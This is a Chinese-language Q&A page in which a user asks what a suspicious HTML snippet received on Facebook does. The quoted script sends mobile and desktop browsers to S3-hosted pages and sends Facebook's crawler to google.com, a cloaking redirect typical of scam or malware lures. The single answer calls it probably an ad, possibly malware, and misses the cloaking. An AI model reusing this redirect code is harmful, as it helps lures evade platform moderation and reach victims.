Question

这是在嵌入HTML的Facebook中发送给我的。我没有打开这个，因为我怀疑它。任何人都可以告诉我它的作用吗？

问题陈述：这是使用document.write(unescape('<something here>');编写的我没有这个。

`<script type="text/javascript"> // <![CDATA[
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://s3.amazonaws.com/video-asntjhwert/s.html";
} // ]]>
</script>     
<script language=javascript>
if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))
{
location.replace("http://s3.amazonaws.com/video-asntjhwert/s.html");
}
</script>
 <body>

<script>


if (navigator['userAgent']['indexOf']('Firefox') != -1) {
    window['location'] = 'https://s3.amazonaws.com/video-asntjhwert/index.html';
} else {
    if (navigator['userAgent']['indexOf']('Facebook Bot') != -1) {
        window['location'] = 'http://google.com/';
    } else {
        if (navigator['userAgent']['indexOf']('Chrome') != -1) {
            window['location'] = 'https://s3.amazonaws.com/video-asntjhwert/index.html';
            } else {
            window['location'] = 'http://s3.amazonaws.com/video-asntjhwert/s.html';
        };
    };
};
</script>
</body>'));

`

Answer 1

第一部分检查您使用Android或iOS的移动操作系统，而第二部分则寻找PC浏览器，它们之间有一个共同之处，它将您重新路由到一个网页，可能在AWS服务器上托管，可能是一个视频，您可以得出结论，它主要是一个广告！但请注意，它可能是一个伪装的恶意软件，也是由某个人注入的！

HTML中未转义的字符串

1 个答案: